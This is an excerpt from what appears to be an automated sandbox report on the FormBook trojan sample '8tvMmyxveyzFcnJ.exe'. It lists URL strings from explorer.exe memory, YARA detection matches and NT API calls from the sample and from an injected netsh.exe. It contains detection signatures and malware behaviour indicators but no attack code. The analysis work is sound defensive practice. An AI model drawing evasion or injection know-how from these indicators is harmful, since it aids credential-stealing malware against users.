          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000000.1707756779.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4153126684.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4157684455.000000000F8A5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2b55708.2.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15142
          Source: 0.2.8tvMmyxveyzFcnJ.exe.5610000.13.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15142
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A35F NtCreateFile,3_2_0041A35F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A48A NtClose,3_2_0041A48A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041A53A NtAllocateVirtualMemory,3_2_0041A53A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2B60 NtClose,LdrInitializeThunk,3_2_013F2B60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_013F2BF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2AD0 NtReadFile,LdrInitializeThunk,3_2_013F2AD0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_013F2D30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_013F2D10
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_013F2DF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_013F2DD0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_013F2C70
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_013F2CA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2F30 NtCreateSection,LdrInitializeThunk,3_2_013F2F30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2FB0 NtResumeThread,LdrInitializeThunk,3_2_013F2FB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_013F2F90
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2FE0 NtCreateFile,LdrInitializeThunk,3_2_013F2FE0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_013F2EA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_013F2E80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F3010 NtOpenDirectoryObject,3_2_013F3010
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F3090 NtSetValueKey,3_2_013F3090
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F4340 NtSetContextThread,3_2_013F4340
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F35C0 NtCreateMutant,3_2_013F35C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F4650 NtSuspendThread,3_2_013F4650
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F39B0 NtGetContextThread,3_2_013F39B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2BA0 NtEnumerateValueKey,3_2_013F2BA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2B80 NtQueryInformationFile,3_2_013F2B80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2BE0 NtQueryValueKey,3_2_013F2BE0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2AB0 NtWaitForSingleObject,3_2_013F2AB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2AF0 NtWriteFile,3_2_013F2AF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F3D10 NtOpenProcessToken,3_2_013F3D10
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2D00 NtSetInformationFile,3_2_013F2D00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F3D70 NtOpenThread,3_2_013F3D70
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2DB0 NtEnumerateKey,3_2_013F2DB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2C00 NtQueryInformationProcess,3_2_013F2C00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2C60 NtCreateKey,3_2_013F2C60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2CF0 NtOpenProcess,3_2_013F2CF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2CC0 NtQueryVirtualMemory,3_2_013F2CC0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2F60 NtCreateProcessEx,3_2_013F2F60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2FA0 NtQuerySection,3_2_013F2FA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2E30 NtWriteVirtualMemory,3_2_013F2E30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F2EE0 NtQueueApcThread,3_2_013F2EE0
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88EE12 NtProtectVirtualMemory,4_2_0F88EE12
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88D232 NtCreateFile,4_2_0F88D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88EE0A NtProtectVirtualMemory,4_2_0F88EE0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92AD0 NtReadFile,LdrInitializeThunk,6_2_00D92AD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92B60 NtClose,LdrInitializeThunk,6_2_00D92B60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_00D92CA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00D92C70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92C60 NtCreateKey,LdrInitializeThunk,6_2_00D92C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92DD0 NtDelayExecution,LdrInitializeThunk,6_2_00D92DD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00D92DF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92D10 NtMapViewOfSection,LdrInitializeThunk,6_2_00D92D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_00D92EA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92FE0 NtCreateFile,LdrInitializeThunk,6_2_00D92FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92F30 NtCreateSection,LdrInitializeThunk,6_2_00D92F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D935C0 NtCreateMutant,LdrInitializeThunk,6_2_00D935C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D94340 NtSetContextThread,6_2_00D94340
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D94650 NtSuspendThread,6_2_00D94650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92AF0 NtWriteFile,6_2_00D92AF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92AB0 NtWaitForSingleObject,6_2_00D92AB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92BF0 NtAllocateVirtualMemory,6_2_00D92BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92BE0 NtQueryValueKey,6_2_00D92BE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92B80 NtQueryInformationFile,6_2_00D92B80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92BA0 NtEnumerateValueKey,6_2_00D92BA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92CC0 NtQueryVirtualMemory,6_2_00D92CC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92CF0 NtOpenProcess,6_2_00D92CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92C00 NtQueryInformationProcess,6_2_00D92C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92DB0 NtEnumerateKey,6_2_00D92DB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92D00 NtSetInformationFile,6_2_00D92D00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92D30 NtUnmapViewOfSection,6_2_00D92D30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92EE0 NtQueueApcThread,6_2_00D92EE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92E80 NtReadVirtualMemory,6_2_00D92E80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92E30 NtWriteVirtualMemory,6_2_00D92E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92F90 NtProtectVirtualMemory,6_2_00D92F90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92FB0 NtResumeThread,6_2_00D92FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92FA0 NtQuerySection,6_2_00D92FA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D92F60 NtCreateProcessEx,6_2_00D92F60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D93090 NtSetValueKey,6_2_00D93090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D93010 NtOpenDirectoryObject,6_2_00D93010
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D939B0 NtGetContextThread,6_2_00D939B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D93D70 NtOpenThread,6_2_00D93D70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D93D10 NtOpenProcessToken,6_2_00D93D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041A35F NtCreateFile,6_2_0041A35F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041A40A NtReadFile,6_2_0041A40A
